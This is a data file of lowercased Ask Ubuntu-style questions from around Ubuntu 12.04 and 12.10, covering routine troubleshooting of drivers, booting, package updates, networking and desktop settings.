232841	digisol modem detected but no name in lsusb	my digisol modem is detected but there is no name in lsb list root @ ampm : / # lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 008 : id 2077 : f000 bus 001 device 007 : id 0403:6011 future technology devices international , ltd bus 001 device 006 : id 0403:6011 future technology devices international , ltd bus 001 device 005 : id 0403:6011 future technology devices international , ltd bus 001 device 004 : id 0403:6011 future technology devices international , ltd bus 001 device 003 : id 0409:005a nec corp. highspeed hub bus 001 device 002 : id 0781:5567 sandisk corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i want to give name in bus 001 device 008 : id 2077 : f000 as per shown in above . how can i manually edit name ?
232843	how can i change jamvm on my embedded system to openjdk ?	i have one embedded system currently working on jamvm . i want to change it to openjdk . how can i do that ? ? ?
232846	how to reverse the lower case characters in word using only sed	reverse every word of a line using sed description -- -- -- -- -- - the job to do is reversing every word of a line . that a word is a sequence of lowercase alphabets raw input -- -- -- -- - 112358 is a fibonacci sequence ... a test line 124816 1392781 final line ... desired output -- -- -- -- -- -- -- 112358 si a iccanobif ecneuqes ... a tset enil 124816 1392781 lanif enil ...
232850	update manager will not update due to authentication error	i press 'install updates ' and then it will say requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . then it will ask me to close . this happens for every update . it seems the update manager is self-defeating . the details section is a mess . it just seems to list all the updates that wo n't work , ie all : 0ad 0ad-data 0ad-data-common activity-log-manager-common activity-log-manager-control-center apparmor appmenu-gtk appmenu-gtk3 apport apport-gtk apport-symptoms apt apt-transport-https apt-utils aptdaemon aptdaemon-data bamfdaemon base-files bind9-host brasero brasero-cdrkit brasero-common busybox-initramfs busybox-static colord compiz compiz-core compiz-gnome compiz-plugins-default coreutils cups cups-bsd cups-client cups-common cups-ppdc dnsutils firefox firefox-globalmenu firefox-gnome-support firefox-locale-en flashplugin-installer gdb gimp gimp-data gir1.2-gtk-3.0 gir1.2-gudev-1.0 gir1.2-javascriptcoregtk-3.0 gir1.2-webkit-3.0 gnome-accessibility-themes gnome-control-center gnome-control-center-data gnome-power-manager gnome-settings-daemon gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter icedtea-7-jre-jamvm im-switch indicator-messages indicator-status-provider-mc5 jockey-common jockey-gtk landscape-client-ui-install libapt-inst1.4 libapt-pkg4.12 libavcodec53 libavdevice53 libavformat53 libavutil51 libbamf0 libbamf3-0 libbind9-80 libbrasero-media3-1 libc-bin libc-dev-bin libc6 libc6-dev libcolord1 libcups2 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsmime1 libcupsppdc1 libdecoration0 libdns81 libfreerdp-plugins-standard libfreerdp1 libgail-3-0 libgimp2.0 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglu1-mesa libgnome-control-center1 libgtk-3-0 libgtk-3-bin libgtk-3-common libgudev-1.0-0 libgwibber-gtk2 libgwibber2 libindicator-messages-status-provider1 libisc83 libisccc80 libisccfg82 libjavascriptcoregtk-1.0-0 libjavascriptcoregtk-3.0-0 libldap-2.4-2 liblwres80 libnautilus-extension1a liboverlay-scrollbar-0.2-0 liboverlay-scrollbar3-0.2-0 libparted0debian1 libperl5.14 libpostproc52 libproxy1 libproxy1-plugin-gsettings libproxy1-plugin-networkmanager libpython3.2 libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-opengl libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libssh-4 libswscale2 libtiff4 libudev0 libunity-core-5.0-5 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxatracker1 libxcb-composite0 libxcb-dri2-0 libxcb-glx0 libxcb-randr0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb-xv0 libxcb1 libxml2 light-themes linux-generic-pae linux-headers-3.2.0-35 linux-headers-3.2.0-35-generic-pae linux-headers-generic-pae linux-image-3.2.0-35-generic-pae linux-image-generic-pae linux-libc-dev lsb-base lsb-release make multiarch-support nautilus nautilus-data openjdk-7-jre openjdk-7-jre-headless openjdk-7-jre-lib overlay-scrollbar parted perl perl-base perl-modules python-apport python-aptdaemon python-aptdaemon.gtk3widgets python-aptdaemon.pkcompat python-keyring python-libproxy python-libxml2 python-problem-report python-ubuntu-sso-client python3.2 python3.2-minimal qdbus seahorse thunderbird thunderbird-globalmenu thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-us ubuntu-sso-client ubuntu-sso-client-gtk ubuntu-sso-client-qt udev unity unity-common unity-greeter unity-lens-applications unity-services update-notifier update-notifier-common xserver-xorg-input-wacom xul-ext-ubufox mind you , it does this even for the ubuntu updates . i 've checked the authencation int he settings and nothing seems to be the problem .
232854	what does /dev/sda mean while installing ubuntu ?	i am trying to install ubuntu on my laptop . at the time of installation , `` type '' shows only /dev/sda . what does this mean ? my laptop has a 500gb hard drive and a 32gb ssd , where are they ?
232857	what is the difference in /home locations between nautilus and the command-line ?	i can not understand why in the bash , the path for ( let 's say ) the videos folder is /home/ioannis/videos and in the nautilus is /home/home/videos . this is what it looks like : bash nautilus any idea what is causing this ?
232858	acer aspire one d270 : ubuntu 12.04 or 12.10 ?	i 've bought an acer aspire one d270 netbook as a cristmass gift for my wife . now i 'm not sure which version of ubuntu will work best : the new 12.10 or the lts 12.04 ? thanks in advance .
232859	where can i download ubuntu 10.04.4 lts desktop edition for 64 bit ?	i am unable to find the link to download 64 bit ubuntu version 10.04.4 for intel based processor .
232861	why ubuntu 12.10 the touch screen inputs goes to second monitor ?	i have elo touch screen , connected to a vga output , and i have another screen connected to hdmi output . when i touch the touch screen , its 1024x768 resolution , the cursor goes always to other screen when i drag my touch it moves on other screen abnormally . how do i tell all the touch input should stay in touch screen not in other screen ? i have tried : xinput set-int-prop `` elo touchsystems , inc. elo touchsystems 2700 intellitouch ( r ) usb touchmonitor interface '' `` evdev axis calibration '' 32 -4000 4093 -100 4089 but its not working at all . any fix on this ?
232867	how to make a bootable cd using imgburn ?	what should we give in the `` advanced bootable disc '' tab ?
232869	text selection ctrl+shift+cursor keys in shell ?	i 'm using guake and zsh and i 'd like to use ctrl+shift+arrows to select word-by-word , ctrl+arrows to jump around words , shift+arrows to select char-by-char in terminal . this is working as expected in applications like gedit . is it possible in any shell ?
232872	`` could not find '' executable . '' after apt-get install/remove	i get this message ( could not find '' executable . ) in terminal after using sudo apt-get since i installed and removed krusader . i 'm using ubuntu 12.10 with unity . $ sudo apt-get remove gstm reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : gstm 0 upgraded , 0 newly installed , 1 to remove and 17 not upgraded . after this operation , 265 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 168039 files and directories currently installed . ) removing gstm ... processing triggers for man-db ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... $ could not find '' executable . $ path : echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbinââ : /bin : /usr/games : /usr/local/games
232875	force ./configure not to look in /usr/lib /usr/bin /usr/include	i want to compile ffmpeg but as you know its compile will ( by default ) look in the system 's 'lib include bin ' directories before following my orders set via -- extra-cflags or -- extra-ldflags now the system directory has for instance faac , x264 , vpx ... .which i do n't want to modify simply because thy are interlinked with many other application such as firefox , skype , totem , vlc ... & by removing them i will remove every dependent application so is there any way ( flag ) that i pass on to the ./compile such that it do n't look at system directories only to the directories i specify myself .
232876	how to let a virtualbox guest ( running windows ) access the internet ?	i have a virtualbox virtual machine . the host machine runs ubuntu . the guest ( virtual ) machine runs windows xp . i googled this problem , and people claim that they fixed it by changing adapter type to nat , but there is no such option for me : any idea ? update : it did n't work either , after just switching it to nat . here are the current settings ( with all details shown ) : here 's a screenshot of the guest showing some networking information : ( please note that this question is about how to give a vm internet access in virtualbox , so the presence of a picture of windows does n't automatically make this off-topic ! ) larger image here .
232879	installation problem with ubuntu 12.10 in windows 8	i cant see the login page of ubuntu 12.10 installation in my pc , and shows some black screen showing grub . i installed it from wubi.exe . specifications of my pc os-windows 8 pro 32 bit ram-1.5gb ddr2 processor-amd athlon 64 gpu-nvidia geforce 6100 nforce 405
232886	what does ubuntu iso `` desktop image `` mean ?	i see here the expression '' desktop image '' in the sense that it `` allows you to try ubuntu without changing your computer at all , and at your option to install it permanently later '' is this just about the fact that it is a `` live cd '' and provides the `` try ubuntu '' option , or is it about something else ?
232888	ubuntu 12.04.1 lts does not recognise wireless ethernet card	setup ubuntu 12.04.1 lts as a vm on windows 8 host pc . but the wireless card is not recognised though the virtual switch comprising of the wireless card ( intel centrino ) has been added as network adapter
232892	how to downgrade linux-image-generic-pae	i 'm trying successfully complete a apt-get -f install but it fails because it says it needs version 3.2.0.34.37 of this package but 3.2.0.35.40 is installed . i found another post that explains how to downgrade a package , but when i try to downgrade this pkg , i get a message saying the lower package does n't exist . this is on 12.04 server edition .
232893	i cant boot with windows anymore , help !	i installed ubuntu 12.10 desktop 32 bit version along with my windows 7 ultimate 32bit version ( which already existed ) . i think when installing with the option in the installer it asked which one to boot with i think i gave windows loader , and now when i restart i get ubuntu , advanced ubuntu , ... and the last one is windows loader i tried clicking it , it just enters and is it is again back to the same page , can i now boot with windows or have i done a mistake somewhere . plz help me and if i have mistaken please correct me .
232898	wireless problem with auto connecting and a hack i use	i purchased a new computer at the beginning of 2012 . an asus u56e and it is very nice . the only problem i have had with it is connecting to the internet . no matter what distro i have tried it wo n't just connect . i have to apply a hack ( see below ) to get wireless to work . i found this hack somewhere on the net and i have a terminal automatically start at login and this is when i apply the hack . wireless wo n't work till then . i like ubuntu but mostly i use linux mint . what i want is to just start my computer and once i get to the desktop be online . i am pretty sure it is a driver issue but is says there is a driver installed ( iwlwifi ) . could the driver be the wrong one ? could the kernel be causing this problem ? i have no problem connecting to the internet wirelessly with an old linux distro using kernel 2.6.38 . is there an easier way to get on wirelessly ? if you need more info , just ask . thank you for your help . my computer specs.. [ ~ ] $ inxi -f system : host : laptop kernel : 3.5.0-17-generic x86_64 ( 64 bit ) desktop : gnome distro : linux mint 14 nadia machine : mobo : asustek model : u56e version : 1.0 bios : american megatrends version : u56e.211 date : 09/29/2011 cpu : dual core intel core i5-2450m cpu ( -ht-mcp- ) cache : 3072 kb flags : ( lm nx sse sse2 sse3 sse4_1 sse4_2 ssse3 vmx ) clock speeds : 1 : 800.00 mhz 2 : 800.00 mhz 3 : 1600.00 mhz 4 : 2501.00 mhz graphics : card : intel 2nd generation core processor family integrated graphics controller x.org : 1.13.0 drivers : intel ( unloaded : fbdev , vesa ) resolution : 1366x768 @ 60.0hz glx renderer : mesa dri intel sandybridge mobile glx version : 3.0 mesa 9.0 audio : card : intel 6 series/c200 series chipset family high definition audio controller driver : snd_hda_intel sound : advanced linux sound architecture ver : 1.0.25 network : card-1 : intel centrino wireless-n + wimax 6150 driver : iwlwifi if : wlan1 state : up mac : 40:25 : c2:8a : e8:88 card-2 : atheros ar8151 v2.0 gigabit ethernet driver : atl1c if : eth0 state : down mac : 54:04 : a6:36:55 : d9 drives : hdd total size : 1750.4gb ( 51.7 % used ) 1 : id : /dev/sda model : st9750423as size : 750.2gb 2 : id : /dev/sdb model : desktop size : 1000.2gb partition : id : / size : 9.2g used : 4.4g ( 51 % ) fs : ext4 id : /boot size : 985m used : 47m ( 5 % ) fs : ext4 id : /home size : 677g used : 31g ( 5 % ) fs : ext4 id : swap-1 size : 1.07gb used : 0.00gb ( 0 % ) fs : swap raid : no raid devices detected - /proc/mdstat and md_mod kernel raid module present sensors : system temperatures : cpu : 49.0c mobo : n/a fan speeds ( in rpm ) : cpu : n/a info : processes : 162 uptime : 1:23 memory : 699.6/5874.8mb client : shell inxi : 1.8.4 [ ~ ] $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 02:00.0 network controller : intel corporation centrino wireless-n + wimax 6150 ( rev 67 ) 03:00.0 usb controller : asmedia technology inc. asm1042 superspeed usb host controller 04:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) [ ~ ] $ ifconfig eth0 link encap : ethernet hwaddr 54:04 : a6:36:55 : d9 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3880 errors:0 dropped:0 overruns:0 frame:0 tx packets:3880 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:386545 ( 386.5 kb ) tx bytes:386545 ( 386.5 kb ) wlan1 link encap : ethernet hwaddr 40:25 : c2:8a : e8:88 inet addr:192.168.1.6 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :4225 : c2ff : fe8a : e888/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:339216 errors:0 dropped:0 overruns:0 frame:0 tx packets:129505 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:478921988 ( 478.9 mb ) tx bytes:14815164 ( 14.8 mb ) [ ~ ] $ iwconfig wlan1 ieee 802.11bgn essid : '' fbi van # 2 '' mode : managed frequency:2.417 ghz access point : e0:46:9a:58 : c9:08 bit rate=150 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=69/70 signal level=-41 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:52921 invalid misc:5378 missed beacon:0 eth0 no wireless extensions . lo no wireless extensions . the hack that i use.. ( i have to manually enter this text in a terminal , enter my password before my computer will connect to the internet via wireless . ) i do n't just type it in , i made an alias ( wifi ) and then password . as soon as i hit enter , my computer is online . [ ~ ] $ sudo modprobe -r iwlagn & & sudo modprobe iwlagn bt_coex_active=0
232911	ubuntu 12.10 no audio via hdmi	i am a new user to ubuntu ( windows 7 failed on me a few days back so i thought i 'd give ubuntu 12.10 a shot ) . anyways , i 'm using hdmi output from my pc to my led tv for audio/video . video seems fine , but there is no sound . i need step by step instructions please , with the proper commands to try . thanks .
232912	is it worth updating to amd catalyst driver 12.11 beta on ubuntu 12.10 ?	i am currently running an x86 ubuntu 12.10 setup with an amd radeon hd 7770 . graphics are in vesa mode . if i am correct , the amd catalyst 12.10 proprietary linux x86 driver is n't supported by ubuntu 12.10 , but that the catalyst 12.11 beta is . i 've heard that in its current state , there are performance problems with this beta driver ( glitchy gui , etc ) . that being said , should i update to the 12.11 beta bearing these risks in mind , or am i better off staying in vesa and waiting for a more stable driver release ? can anyone confirm the current performance problems with the catalyst 12.11 ? thanks in advance .
232914	i ca n't install any packages without it failing - i get an error about config.dat being locked - how can i fix this ?	i had a power failure on my laptop , so i ended up crashing in the middle of a package installation . how do i fix this error ? jrg @ atlantis : ~ $ sudo apt-get upgrade -- fix-missing reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable setting up man-db ( 2.6.3-1 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing man-db ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : man-db e : sub-process /usr/bin/dpkg returned an error code ( 1 ) jrg @ atlantis : ~ $
232915	gpu compatibility	i 've recently installed ubuntu 12.10 but have n't succeeded in getting a driver to work with my graphics card ( radeon mobility hd 5650 ) . is there a graphics card out there i can purchase and add to my system for which there is a confirmed compatible driver ? note : i 'm not a gamer or anything like that ; my graphics needs are rather basic .
232917	asus ux32vd on 12.10 stopped working after upgrade to kernel 3.5.0-19-generic	i own an asus ux32vd . i managed to install 12.10 without any problems following the advices on this page . everything worked as expected , even many of the fn keys , excluding f5 and f6 . the problem came after upgrading the kernel to 3.5.0-19 and onwards ( as suggested by ubuntu update manager ) that wmi stopped to work . when executing lsmod i can see far less modules loaded than when i boot with a working kernel and loading those modules by hand does not work . actually every fn key behaves as if i was pressing fn+f4 ( this after loading the modules by hand ) . is there anything i can do to make this work ? should n't i be using 12.10 with this hardware ? right now the solution i have is to manually boot with kernel 3.5.0-18 that seems to work flawlessly .
232920	video hangs while playing on vlc	i have just installed ubuntu 12.04 lts.i am unable to play any video.when i play video on vlc the video freezes and after few min it moves to some other frame and also the sound is breaking . pc details ( from ubuntu > system setting > details ) ram 968.5 mib processor amd athlon ( tm ) 64 x2 dual core processor 4000+ ă 2 graphic unknown os type 32 bit disk 248.7 mother board asus m2npv-vm
232921	files with ~ do n't get deleted	i think the title is self-explanatory but let me add more info : ubuntu 12.10 64bit when i delete a file and then use graphical file manager ( nautilus , nemo , etc ... ) the file does not appear to exist , which is what i expect when deleting a file . however , when i use terminal and look at files ( using `` ls '' or `` la '' command ) i can see the deleted files with `` ~ '' added after their names . for instance , a file named `` test.txt '' will have a copy named `` test.txt~ '' after deletion . is this a bug ? why do n't those files get deleted even after some time ?
232924	windows 8 not booting any more	i installed ubuntu 12.10 alongside windows 8 after this guide . now i ca n't boot windows 8 any more . when i choose it in the grub screen , it shows me some kind of error , and after pressing enter it says : `` a disk reading error ocurred , press ctrl+alt+del to reboot '' . when i reboot , it 's just the same again . ubuntu is booting normally ...
232925	how can i download ubuntu 's source code from windows ?	i am still learning c and i want to get ubuntu 's source code . can i somehow get it on windows ? ( i ca n't install ubuntu on my laptop , i wanted to dual boot but i do n't understand how to manage the partitions . ) can i download the source code from the internet and open it with ms visual c++ ? should i get it in a virtual environment and somehow move it to windows ? thanks for help !
232926	`` /etc/x11/x not executable '' error when startx	what happened i wanted to install kde and gnome along with unity . i do n't know when i installed gnome-shell on my ubuntu 12.10 , but i installed kde minimal desktop just now using sudo apt-get install kde-plasma-desktop and selected lightdm as my default dm . then i entered this to install gnome sudo apt-get install gnome-shell and it said i already have it installed . so , then i restarted in normal mode and ubuntu did n't start . problem i went to recovery mode and from root shell i used startx it throws these bunch of errors : /etc/x11/x is not executable xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error and when i tried chmod +x /etc/x11/x it says chmod : can not operate on dangling symlink `/etc/x11/x' i ca n't use apt-get to reinstall packages , because our isp uses portal login - and i do n't know how to login from terminal ( so ca n't connect to network ) . may be i can use live disk , but i do n't know how to configure packages on my hd from livedisk . i am on windows 8 now . any help regarding how can i get my desktop back is appreciated !
232932	in a bash script what does a dot followed by a space and then a path mean ?	i came across this example when trying to mount a usb device inside a openvz container and i have never seen the construct in the second line before . can you explain what it signifies ? # ! /bin/bash . /etc/vz/vz.conf
232934	google hangout client - video not available	i am new to ubuntu . the problem is that no video is available though mic works fine . if i try the simple video chat in gmail that works but not in google hangout . i know it is a duplicate of similar question but when i look at the answers for that duplicate q there i am not sure which command to apply in my case . maybe it is different than the answers in that case . my webcam is not working with google+ hangout , can i make it work ?
232941	gwibber problems	i have configured my facebook account in gwibber since i installed ubuntu 12.10 . until a few days i started to notice that the program does not refresh and display notifications , when opened gwibber interface goes blank and not updated . i read in forums that could be the proxy settings or interfering with its operation but everything is correct . get to the end to try on another computer than with ubuntu 12.10 and gwibber but to my surprise it is the same . not that i make gwibber work i thought it was ubuntu but on another pc than just occurred , not to do , that i can recommend another program or how i can fix this .
232943	launcher not showing among other things	i installed 12.10 on my hp pavilion dm1 . the launcher does not appear . it is not hidden . i ca n't get into the hub either . there are no choices at the top of the screen either , once i log in . how can i get my launcher back ? launcher
232945	how do i take pictures with asus 1015cx ?	i wanted to use my computer to take a picture but could not figure out how to access camera thanks .
232948	why internet disconnects so often ?	i use docomo 2g in a modem to browse . when i am surfing , the internet suddenly disconnects ( `` this may due to the network '' ) . but when i try to reconnect , it is not connecting i have to unplug my modem and plug it , or i have to reboot my system to reconnect it version ubuntu 10.04 why this happens ? ?
232949	unable to run memtest from grub boot menu	12.04 lts running along with windows 8 ( dual boot ) . my problem is when i try to run memtest from grub boot menu i get this error too small lower memory ( 0x99100 > 0x98400 ) i have 1 gb of ram and 80 gb hdd . ubuntu runs on dedicated 12 gb partition with 2 gb swap space . why am i getting this error and how to troubleshoot this error . please provide step by step tips .
232951	booting ubuntu falure : error : attempt to read or write outside of `` hd0 ''	this is my first ever try with ubnuntu . i installed dual boot with windows xp . when booting up on acer aspire 9101 i get the following message . booting ubuntu falure : error : attempt to read or write outside of `` hd0 '' can anybody help ? i am not an ubuntu expert . thx /anton
232957	usb shutting off randomly	i am having problems with my usb devices shutting off at random times and the only way to fix the problem is to do a reboot . the devices that stop working are two hubs and a keyboard and mouse . please help
232960	how do i require two factor authentication to log in ?	running 12.04 . i am trying to separate my wrapped-passphrase for my encrypted home folder to require a usb drive be present to login . i followed the instructions here and added the drive to my fstab , put the wrapped-passphrase file on the drive , and then created a symbolic link back to ~/.ecryptfs . the drive mounts fine but the symbolic link does n't seem to be connecting the two as when i login it flashes a purple screen for a fraction of a second than takes me back to the login screen . what am i doing wrong ?
232961	no grub after ubuntu install	the main issue of the problem is that i ca n't load ubuntu 12.10 desktop - i386 after install near win7basic ( windows 7 was preinstalled on my laptop ) . i 've tried manual reconfiguring of file system , have tried automatic one . also tried to install ubuntu 12.04 - destop - amd64 . none of errors were noticed during the installation process . but after install windows 7 starts automatically . seems to me that nothing changed within winloader . i know that not so much info i put in here , but i 'll answer any questions .
232965	how to clean from non working files ?	i did file recovery using in windows `` recuva '' using deep scan so that recovered a lot bad non working files and im reviewing files in ubuntu . so some files are opening and some not . can i somehow clean or select bad files to move them to another folder ?
232966	what is targetenvironment=unity ?	i have a pure lubuntu 12.10 installation . while looking at some .desktop files in /usr/share/applications i see targetenvironment=unity . one example is in the .desktop file for google chrome : [ newwindow shortcut group ] name=new window exec=/opt/google/chrome/google-chrome targetenvironment=unity [ newincognito shortcut group ] name=new incognito window exec=/opt/google/chrome/google-chrome -- incognito targetenvironment=unity another example is the .desktop file for inkscape : [ drawing shortcut group ] name=new drawing exec=inkscape targetenvironment=unity to find out what that means , i looked at desktop entry specification - freedesktop.org standards and at unitylaunchersanddesktopfiles . but neither mentions targetenvironment . hence my question .
232970	problem in tamil keyboard layout	i am using tamil language for keyboard layout input settings , when i try to use `` mei yelluthukal '' ( in tamil ) , i can not use them , they are present in different form.i am not sure about what to do for that input , can any help me ? the words in the circle is what i am getting , when try to input the words.the words to be , is also given ( using gimp ) .any one who knows about the tamil input settings methods for giving `` mei yelluthukal '' , tell me the ways of input ? .. i am using keyboard layout for input settings and layout is tamil ... is there any way to sent this to ubuntu keyboard layout developers ?
232971	is there a way to paste shortcuts in ubuntu as in windows ?	paste shortcuts , or perhaps create a link to another folder from a folder , or any thing of the sort . i need to do this because i want to crate a link from other directories to my music folder , so that rhythmbox can update its libraries like that . i am also asking if it is a good way for adding music to rhythmbox 's library . i am quite new to this , please pardon if the question meets the foolishness criteria . : | thanks in advance !
232973	installing ubuntu 12.10 on a samsung series 5 windows 8 laptop	i 've recently tried to install ubuntu 12.10 alongside windows 8 which was preinstalled on my machine . i used the lili usb creator to crete a bootable usb . the installation process seemed to be going fine , until there was a screen that popped up and said `` image failed to verify with access denied '' , and when i click ok it boots windows 8 . i can see that separat partition was created for ubuntu on the computer from the new size of my windows c drive , and ubuntu shows up on the boot menu as an option . now , however , my boot preferences are being ignored completely when i hit f2 and go to the boot menu . if i try and re-install ubuntu and set the usb as priority it ignores and boots windows . if i set ubuntu as priority it ignored and boots windows . if i change to disable secure boot and leave uefi it opens windows . if i disable secure boot and turn on csm it doesnt progress beyond a screen asking to select a hard drive , if either are selected it just reboots and brings to the same menu . if i select ubuntu and csm , it boots windows . has anyone had a similar issue when installing 12.10 ? i 'm concerned it wont even let me select boot order properly now and completely ignores my ubuntu install . -k
232974	can not install libgtk2.0-dev	i upgraded my ubuntu from oneiric to precise by accident . recently i want to learn gtk/gnome programming , so i 'm going to install libgtk2.0-dev . i got an error the following packages have unmet dependencies : libgtk2.0-dev : depends : libgtk2.0-0 ( = 2.24.10-0ubuntu6 ) but 2.24.10-1oneiric6~ppa is to be installed depends : libpango1.0-dev ( > = 1.20 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . what shall i do ?
232977	headphones output from vlc player	this is strange , when i play a file in vlc there is output only from left link , when i change the audio channel to right and reset to stereo the right link works . does anyone know how to fix this or know why does this happen ?
232978	unable to access second hdd . ubuntu 12.04	this is the error i get when trying to write to my second hard drive . error opening file '/media/hdd2/01 queen - keep yourself alive.mp3 ' : permission denied the hdd is mounting on start up . but i have been unable to access it . it says the owner is root . please help i need this done before jan 10 i will be deploying to the middle east . and i despise windows . especially windows 8 which i have already gotten rid of .
232980	reasonable usb mount points	plugging in my android cellphone in mass storage mode mounts the sd card via usb onto an insane pathname like /media/sp ; < _html > / which of course causes problems later with other programs like samba/smbd sharing over the network , etc . how can i change the default mount point for this device , for every time it visits my ubuntu machine again in the future ? is there a way to ensure an alphanumeric-only character set no matter what usb mass storage device gets plugged in , esp . ones the host has n't seen yet ?
232982	is there any gtk+ 3 port of the redmond theme ?	i have the gtk2 version of redmond installed , but it does n't work for programs using gtk3 . redmond looks like this : or are there any gtk3 themes similar to redmond ?
232984	how to completely uninstall u1 client from os x	i recently installed the u1 client for mac ( os x 10.8.2 ) . it 's definitely got some rough edges , like occasionally taking forever to sync and the menubar helper does n't quit when i select quit . so i want to remove it completely . how do i do that ?
232985	many problems booting / shuting down ubuntu 12.10	i installed ubuntu 12.10 about a month ago , and since then it 's been some kind of a nightmare ! not listing all the issues i had to face , now i have this weird behaviour that really bugs me : when i turn on my pc ( and if it properly boots after grub 's menu ) , sometimes the synaptic touchpad does not work at all . i can login using the keyboard and then use the terminal to try to reboot or attempt to fix problems , but this results usually in the pc freezing at the `` exit '' screen , with strange lines of messages interfering with the coloured background . every possible solution found to fix the touchpad wo n't be of any help . thus , with no touchpad and the pc stuck , all i can do is to brutally shut the pc down and restart : it usually takes from two to five times in a row of `` brute-shut-downs_reboots '' before getting the touchpad back working . and when it works , i can check all properties and log files related , but always everything appears to be fine . i 'd like to know which conditions could lead to such random behaviour and , if any , which actions to attempt in order to solve this annoying problem ps i 'm running ubuntu 12.10 64bit with gnome3 , linux kernel 3.5.0-21-generic . but these problems persist also in unity . what i 've noticed is that using kernel 3.5.0-18-generic the whole system just runs better , but it might be just a feeling !
232988	why is there a shell given to user for postgresql ?	cat /etc/passwd |grep postgre postgres : x:115:127 : postgresql administrator , , , :/var/lib/postgresql : /bin/bash apt-cache show postgresql package : postgresql priority : optional section : database installed-size : 65 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : debian postgresql maintainers < pkg-postgresql-public @ lists.alioth.debian.org > architecture : all source : postgresql-common ( 136 ) version : 9.1+136 depends : postgresql-9.1 filename : pool/main/p/postgresql-common/postgresql_9.1+136_all.deb size : 5468 md5sum : 34f5a1373ad5cd0b6f5aa3e7af06c9e7 sha1 : 6f271758bd51c23614b12fd63fb711ecfa43e9e5 sha256 : e8921a22b560e81f57a2a00001e31ba1036f67a8e7f151bf8f977b4919fc559a can i replace that /bin/bash with /bin/false ?
232991	how to downgrade ubuntu after 12.10 issues ?	i installed 12.10 removing windows xp on a netbook . the installation was successfully but the system is working too slow . i have tried to reformat the drives so i can downgrade but none of the reinstalls ( 12.04 & 11.10 ) worked . all i want to do is start again , clean the whole hard drive so there is no trace of 12.10 to enable a fresh install of 11.10 ( i believe this works fine with my netbook specs ) or even windows xp . i do n't know where to start !
232996	why do most window managers fail to show a custom cursor correctly ?	please note : i am not so much looking for a fix , as there does n't seem to be one . however , i want to know why most window managers ignore my choice of cursor theme and show the default cursor no matter what . is there a problem with the architecture of x that causes this ? why do n't some cursor themes show up in gnome ? is not the same question .
